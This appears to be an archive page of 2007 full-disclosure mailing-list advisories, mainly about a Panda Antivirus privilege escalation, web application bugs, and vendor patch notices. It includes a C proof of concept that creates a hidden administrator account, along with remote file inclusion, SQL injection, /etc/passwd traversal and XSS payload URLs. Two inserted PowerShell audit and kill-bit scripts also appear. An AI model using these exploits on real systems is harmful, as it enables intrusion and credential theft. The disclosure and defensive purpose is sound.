Panda Antivirus 2008 Local Privilege Escalation (UPS they did it again)

2007-08-02 Thread tarkus
_
Security Advisory
_
_

  Severity: Medium
  Title: Panda Antivirus 2008 Local Privilege Escalation
  Date: 02.08.07 
  Author: tarkus (tarkus (at) tiifp (dot) org)
  URL: https://tiifp.org/tarkus
  Vendor: Panda (http://www.pandasoftware.com/)
  Affected Products: Panda Antivirus 2008
  Not Affected Products: - Panda Internetsecurity 2008
                         - Panda Antivirus + Firewall 2008

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Description:


1.  During installation of Panda Antivirus 2008 the permissions for the
installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008\
are by default set to Everyone:Full Control. A few services
(e.g. PAVSRV51.EXE) are started from this folder. The services are started
under the LocalSystem account. There is no protection of the service files. It's
possible for an unprivileged user to replace a service executable with a
file of his choice to get full access with LocalSystem privileges, or to
get the privileges of any user (including the system administrator) who logs on
to the vulnerable host. This can be exploited by:

a. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
b. Copy any application to PAVSRV51.exe
c. Reboot

Upon reboot the trojaned application will be executed under the LocalSystem
account.

BTW: Check this from last year (http://www.securityfocus.com/bid/19891)
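As an added check (not part of tarkus's advisory), the following PowerShell script looks for the class of misconfiguration described above on a host: services running as LocalSystem whose executable, or the folder holding it, grants write-class rights to Everyone, Users or other low-privileged principals. The principal list and the rights mask are assumptions chosen for this example; the function names are its own.

```powershell
# Added example, not part of the advisory: audit LocalSystem services for image
# files or image folders writable by low-privileged principals (the
# Everyone:Full Control misconfiguration described above).
# Read-only; run from an elevated PowerShell so every ACL can be read.

# Principals that should never hold write rights over a service binary (assumed list).
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets a user rename the executable or drop a replacement.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

function Get-ServiceImagePath {
    # Extract the executable from Win32_Service.PathName, which may be
    # quoted ("C:\Program Files\x\svc.exe" -arg) or unquoted (C:\x\svc.exe -arg).
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+\.exe)')  { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-WeakAcl {
    # Emit one record per Allow ACE that grants a weak principal write-class rights.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Cast to int: ACLs can carry generic-right bits outside the enum's named values.
        $rights = [int]($ace.FileSystemRights)
        if (($rights -band $WriteMask) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (-not $svc.PathName) { continue }
    # Only services running as SYSTEM turn a writable binary into a SYSTEM-level escalation.
    if ($svc.StartName -notin @('LocalSystem', 'NT AUTHORITY\SYSTEM')) { continue }
    $exe = Get-ServiceImagePath $svc.PathName
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
    # Check the folder as well as the file: Full Control on the folder is enough to
    # rename the service binary and put another file in its place, even if the
    # file itself is locked down.
    foreach ($target in @($exe, (Split-Path -Parent $exe))) {
        foreach ($hit in (Test-WeakAcl -Path $target)) {
            [pscustomobject]@{
                Service   = $svc.Name
                Account   = $svc.StartName
                Path      = $hit.Path
                Principal = $hit.Principal
                Rights    = $hit.Rights
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    'No LocalSystem service binaries or folders writable by weak principals.'
}
```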


POC:


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* Placed in the Panda folder as PAVSRV51.exe, this is started as LocalSystem
   at boot and uses net.exe to create a local administrator account. */
INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add",
              szWinDir );

    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add",
              szWinDir );

    system( szCmdLine );

    return 0;
}


Vendor Response:


[...]
Thank you very much for having reported us this piece of information.
This feedback will allow us to keep improving our products and to
prepare new releases that will fit your actual needs and helps us to
create a better product.
[...]



Disclosure Timeline:


2007.06.07 - Vulnerability found
2007.06.07 - Reported to Vendor (Until Beta)
2007.07.31 - Released by vendor
2007.08.02 - Public Disclosure





[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON

2007-08-02 Thread Aditya K Sood

hi

A specific white paper has been released, comprising
specific application problems related to Bison.

You can look into it.

http://www.secniche.org/papers/Ser_Insec_Bison.pdf

Regards
AKS
http://www.secniche.org


Tour de France Pool 1.0.1 Remote File Include Bug

2007-08-02 Thread yollubunlar
Yollubunlar.Org

Title   : Tour de France Pool 1.0.1 Remote File Include Bug

Author  : Yollubunlar.Org

Original : 
http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.html

Mail: [EMAIL PROTECTED]

Down: 
http://joomla.bultena.com/component/option,com_remository/Itemid,26/func,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/

Bug : in admin.tour_toto.php
" require_once( $mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders.php'); "

Exploit : 
site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=sHELL?

Greetz:  Yollubunlar.Org 

Note: Long live the homeland! Martyrs do not die, the homeland will not be divided.


Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln

2007-08-02 Thread yollubunlar
///Yollubunlar.Org///
Title: Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln

Author   : Yollubunlar
Original: 
http://yollubunlar.org/hunkaray-okul-portali-v11-tr-sql-injection-vuln-44.html
Web Page :www.yollubunlar.orgg

Contact  : [EMAIL PROTECTED]

Vulnerability : in duyuruoku.asp

http://site.com/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin

Note : The homeland will not be divided, martyrs do not die!

///Yollubunlar.Org///


Minimo .2 and more Firefox 2.0.0.6 Password Manager Vulnerabilities

2007-08-02 Thread Seth Fogie


Airscanner Mobile Security Advisory #07080102: Minimo <=.2 and Firefox 2.0.0.6

Product:
Minimo <=.2 and Firefox 2.0.0.6

http://airscanner.com/security/07080103_minimo.2.htm

Platform:
Tested on Minimo .016 and .2 Windows Mobile Pocket PC 2005 and Firefox 
2.0.0.6 Windows XP SP2


Requirements:
Mobile device running Windows Mobile Pocket PC or Firefox 2.0.0.6 on XP

Credits:
Seth Fogie
Airscanner Mobile Security
http://www.airscanner.com
01/10/2007 for Minimo .016 and 07/22/2007 for Minimo .2 (Windows Mobile) 
and 08/02/2007 for Firefox 2.0.0.6


Risk Level:
High - Disclosure of sensitive information

Program Summary:
From the website: http://www.mozilla.org/projects/minimo/

Minimo uses Mozilla Technologies to produce a highly usable web browser 
for advanced mobile devices. Features include:

* Fast access to your mobile content via Homebase start page
* Best support for modern web standards (Javascript and AJAX).
* Social Bookmarking
* Tab browsing
* RSS Support
* Proven security (TLS, SSL3)
* International support
* Cross platform capability
* Widget and Extension support

Vulnerability Details:
Minimo includes a password manager feature that allows users to store 
user/password information for sites they visit. There are two ways this 
feature can be abused. First, the action of any form can be changed 
dynamically via JavaScript, which could be introduced into a site via a 
cross-site scripting (XSS) bug. Second, the form fields can be 
automatically filled in without user interaction. As a result, an XSS bug 
could allow an attacker to inject an invisible form into a victim's 
browser that could collect the user/pass without any interaction or 
visible indication.


Note: The Password Manager bug is often misunderstood in terms of how it works. 
The reason is that there are numerous subtle variations in how the 
username and password show up. The following highlights some of these:


1. If there is only one username stored in the password manager for the 
specific site, it will automatically show up in the username field. If there 
is more than one username stored in the Password Manager, a user would 
normally type in or select the specific username for the site, which 
then allows Minimo/Firefox to fill in the password. As a result, an 
attacker would have to know the username to successfully grab the 
credentials.


2. If the password field is named 'password' and there is only one 
username associated with the site, the Password Manager will 
automatically fill in both the user and password. This particular 
version was noticed by 
http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml. 



Similar Firefox bugs have been known about since mid-2006; however, 
https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c44 indicates these 
are supposedly resolved.


The details and vulnerable status of Minimo .2 and below are new.

Proof of Concept

The following webpage provides a link to two pages. The login.php page 
is just a sample form that you can enter a user/pass into. Enter and 
save some sample info and then click on the second poc.htm link. This 
will open a page with a script inside that dynamically creates a framed 
environment, one of which is essentially hidden (note: using 
style:hidden will not work). In the hidden frame, the login.php page is 
loaded, the action is changed, and the user/pass are tickled into the 
form fields. You should see two popups - one with the changed form 
action, and the other with the stored user & pass variables.


http://www.airscanner.com/tests/minimo.htm

Workaround:
Don't use password manager.

Vendor Response:
Awaiting Response.

Copyright (c) 2007 Airscanner Corp.

Permission is granted for the redistribution of this alert 
electronically. It may not be edited in any way without the express 
written consent of Airscanner Corp. If you wish to reprint the whole or 
any part of this alert in any other medium other than electronically, 
please contact Airscanner Corp. for permission.


Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use on an AS IS condition. 
There are no warranties with regard to this information. Neither the 
author nor the publisher accepts any liability for any direct, indirect, 
or consequential loss or damage arising from use of, or reliance on, 
this information.








RE: Re: Guidance Software response to iSEC report on EnCase

2007-08-02 Thread Alex Stamos
iSEC last night released our report on issues discovered in The Sleuth
Kit and Guidance Software's EnCase Forensic and Enterprise Editions:
http://www.isecpartners.com/files/iSEC-Breaking_Forensics_Software-Paper.v1_1.BH2007.pdf

We will send out these bugs in "advisory" format soon.  It should be
noted that these issues were addressed in version 2.09 of The Sleuth
Kit, and most of the EnCase issues (not including our concerns with
EnCase Enterprise's cryptographic system) will be mitigated in the
upcoming version 6.7 release.  

Also of interest to those in the forensics community may be this
analysis of the impact security flaws can have on the use of computer
forensic evidence in civil and criminal proceedings prepared by Chris
Ridder of the Stanford Law School Center for Internet and Society.
Although we are happy to host his paper, this work is the output of Mr.
Ridder and is not officially a publication of iSEC Partners:
http://www.isecpartners.com/files/Ridder-Evidentiary_Implications_of_Security_Weaknesses_in_Forensic_Software.pdf

I would like to thank Tim Newsham, Chris Palmer, and Jesse Burns for
finding these issues.

Thank you,
   Alex




rPSA-2007-0153-1 qt-x11-free

2007-08-02 Thread rPath Update Announcements
rPath Security Advisory: 2007-0153-1
Published: 2007-08-01
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
qt-x11-free=/[EMAIL PROTECTED]:devel//1/3.3.4-5.9-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388
https://issues.rpath.com/browse/RPL-1597

Description:
Previous versions of the qt-x11-free package are vulnerable to
user-assisted format-string attacks, possibly leading to arbitrary
code execution in applications that use the QTextEdit widget.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


Baidu Soba Remote Code Execute Vulnerability(FGA-2007-10)

2007-08-02 Thread hfli
hi full-disclosure,

Baidu Soba Remote Code Execute Vulnerability

by cocoruder of Fortinet Security Research Team
http://ruder.cdut.net


Summary:

Baidu Soba is a popular browser toolbar developed by Baidu, a Chinese 
web search engine company like Google. More information can be found at:

http://www.baidu.com
http://bar.baidu.com/sobar/promotion.html

There exists a remote code execution vulnerability in Baidu Soba's ActiveX 
Control "BaiduBar.dll". A remote attacker who successfully exploits these 
vulnerabilities can completely take control of the affected system.


Affected Software Versions:

Baidu Soba 5.4(Version of "BaiduBar.dll" is 2.0.2.144)



Details:

This vulnerability exists in the function "DloadDS()" exported by 
"BaiduBar.dll". Following is some related information:

InprocServer32: C:\Program Files\baidu\bar\BaiduBar.dll
ClassID   : A7F05EE4-0426-454F-8013-C41E3596E9E9

[id(0x001d), helpstring("method DloadDS")]
void DloadDS(
[in] BSTR bstrUrl, 
[in] BSTR bstrName, 
[in] long lShow);

When we set the parameter "bstrUrl" to a CAB file which can be downloaded via 
the "http" protocol, "DloadDS()" will try to download this file to the Windows Internet 
Explorer temporary directory and try to execute the file named by the parameter 
"bstrName". The key code is as follows:

.text:1006F407 lea     eax, [ebp-28h]
.text:1006F40A lea     ecx, [ebp-10h]
.text:1006F40D push    eax              ; lpProcessInformation
.text:1006F40E lea     eax, [ebp-6Ch]
.text:1006F411 push    eax              ; lpStartupInfo
.text:1006F412 push    esi              ; lpCurrentDirectory
.text:1006F413 push    esi              ; lpEnvironment
.text:1006F414 push    esi              ; dwCreationFlags
.text:1006F415 push    esi              ; bInheritHandles
.text:1006F416 push    esi              ; lpThreadAttributes
.text:1006F417 push    esi              ; lpProcessAttributes
.text:1006F418 push    esi
.text:1006F419 call    sub_10004147     ; get the CommandLine
.text:1006F41E push    eax              ; lpCommandLine
.text:1006F41F push    esi              ; lpApplicationName
.text:1006F420 call    ds:CreateProcessA


As we can see, lpCommandLine points to 
"C:\DOCUME~1\administrator\LOCALS~1\Temp\calc.exe". Because there are no valid 
checks, the attacker can build a CAB file which includes a trojan or spy 
program and use the function "DloadDS()" to execute it.



Attached File:

The exploit can be found at the following URL; please do not use it for attacking.

http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html



Solution:

Baidu said they have fixed this fault, but in fact the product downloaded 
from "http://bar.baidu.com/sobar/promotion.html" is also affected. We strongly 
suggest users set a kill bit for this CLSID.
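The kill-bit mitigation suggested above, as an added PowerShell example that is not part of the advisory: it writes Compatibility Flags = 0x400 under Internet Explorer's ActiveX Compatibility key for the CLSID given in the advisory, which makes IE refuse to instantiate the control whether or not the DLL on disk has been updated. The function names are this example's own.

```powershell
# Added example, not from the advisory: set the Internet Explorer kill bit for
# the BaiduBar.dll control (CLSID taken from the advisory above).
# Run from an elevated PowerShell.

$Clsid   = '{A7F05EE4-0426-454F-8013-C41E3596E9E9}'
$KillBit = 0x400   # "Compatibility Flags" kill bit (Microsoft KB240797)

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so cover both paths.
$BasePaths = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if ([Environment]::Is64BitOperatingSystem) {
    $BasePaths += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Get-CompatibilityFlags {
    # Current "Compatibility Flags" value for a CLSID key, or 0 if absent.
    param([string]$Key)
    $item = Get-ItemProperty -LiteralPath $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]($item.'Compatibility Flags')
}

function Set-ActiveXKillBit {
    # OR the kill bit into any flags already present and return the new value.
    param([string]$BasePath, [string]$Clsid)
    $key = Join-Path $BasePath $Clsid
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $flags = (Get-CompatibilityFlags -Key $key) -bor $KillBit
    Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $flags -Type DWord
    return $flags
}

function Test-ActiveXKillBit {
    # True when the kill bit is present for the CLSID under the given base path.
    param([string]$BasePath, [string]$Clsid)
    $key = Join-Path $BasePath $Clsid
    if (-not (Test-Path -LiteralPath $key)) { return $false }
    return ((Get-CompatibilityFlags -Key $key) -band $KillBit) -eq $KillBit
}

foreach ($base in $BasePaths) {
    Set-ActiveXKillBit -BasePath $base -Clsid $Clsid | Out-Null
    '{0}\{1} : kill bit set = {2}' -f $base, $Clsid, (Test-ActiveXKillBit -BasePath $base -Clsid $Clsid)
}
```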



Disclosure Timeline:

2007.07.19  Vendor notified via email 
2007.07.19  Vendor responded
2007.07.23  Vendor notified me that a new version is available and they 
refused to release an advisory for this vulnerability
2007.07.24  Vendor said they had not updated the product 
successfully
2007.08.01  Vendor notified me again that a new version is available
2007.08.02  But it looks like they failed again
2007.08.02  Advisory released



Disclaimer:

Although Fortinet has attempted to provide accurate information in
these materials, Fortinet assumes no legal responsibility for the
accuracy or completeness of the information. More specific information
is available on request from Fortinet. Please note that Fortinet's
product information does not constitute or contain any guarantee,
warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.


Fortinet Security Research
[EMAIL PROTECTED]
http://www.fortinet.com



Best Regards,


cocoruder of Fortinet Security Research Team
[EMAIL PROTECTED]
  2007-08-02



CVE-2007-3384: XSS in Tomcat cookies example

2007-08-02 Thread Mark Thomas

CVE-2007-3384: XSS in Tomcat cookies example

Severity:
Low (Cross-site scripting)

Vendor:
The Apache Software Foundation

Versions Affected:
3.3 to 3.3.2

Description:
When reporting error messages, Tomcat does not filter user supplied
data before display. This enables an XSS attack.

Mitigation:
Remove examples web application.
Apply patch available from http://tomcat.apache.org/download-33.cgi

Credit:
This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing
and Networking Center, who worked with the CERT/CC to report the
vulnerability.

Example:
http://localhost:8080/examples/servlet/CookieExample
populate Name or Value field with:
alert('XSS reflected');
and submit.

References:
http://tomcat.apache.org/security.html


[ MDKSA-2007:151 ] - Updated qt3 packages fix multiple vulnerabilities

2007-08-02 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:151
 http://www.mandriva.com/security/
 ___
 
 Package : qt3
 Date: August 1, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A number of format string flaws have been discovered in how Qt handled
 error messages by Dirk Mueller and Tracey Parry of Portcullis Computer
 Security.  If an application linked against Qt created an error
 message from user-supplied data in a certain way, it could possibly
 lead to the execution of arbitrary code or a denial of service.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388
 ___
 
 Updated Packages:
 

[USN-494-1] Gimp vulnerability

2007-08-02 Thread Kees Cook
===========================================================
Ubuntu Security Notice USN-494-1            August 02, 2007
gimp vulnerability
CVE-2006-4519
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  gimp 2.2.11-1ubuntu3.4

Ubuntu 6.10:
  gimp 2.2.13-1ubuntu3.3

Ubuntu 7.04:
  gimp 2.2.13-1ubuntu4.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Sean Larsson discovered multiple integer overflows in Gimp.  By tricking
a user into opening a specially crafted DICOM, PNM, PSD, PSP, RAS, XBM,
or XWD image, a remote attacker could exploit this to execute arbitrary
code with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:


Pluck 4.3 themes.php Remote File Inclusion and disclosure

2007-08-02 Thread no-reply
__

Aria-Security Team 
__

Pluck 4.3 Remote File Inclusion
Vendor: http://www.pluck-cms.org/


/path/data/inc/theme.php


If register_globals was set to On, then we can use the $dir variable for RFI

    if (is_file($dir."/".$file))
        $files[] = $file;
    else
        $dirs[] = $dir."/".$file;
    }
}
if ($dirs) {
    foreach ($dirs as $dir) {
        include ("$dir/theme.php");


http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext?



-


fputs($file, "");  


If register_globals was set to On, then we can use the $file variable for 
disclosure.

example:
http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS 
on server)



Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]





[ MDKSA-2007:152 ] - Updated Firefox packages fix multiple vulnerabilities

2007-08-02 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:152
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-firefox
 Date: August 1, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Firefox program, version 2.0.0.6.
 
 This update provides the latest Firefox to correct these issues.
 As well, it provides Firefox 2.0.0.6 for older products.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3089
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3656
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3670
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3735
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3736
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3737
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3738
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3844
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3845
 http://www.mozilla.org/security/announce/2007/mfsa2007-18.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-19.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-20.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-21.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-22.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-23.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-24.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-25.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-26.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-27.html
 ___
 
 Updated Packages:
 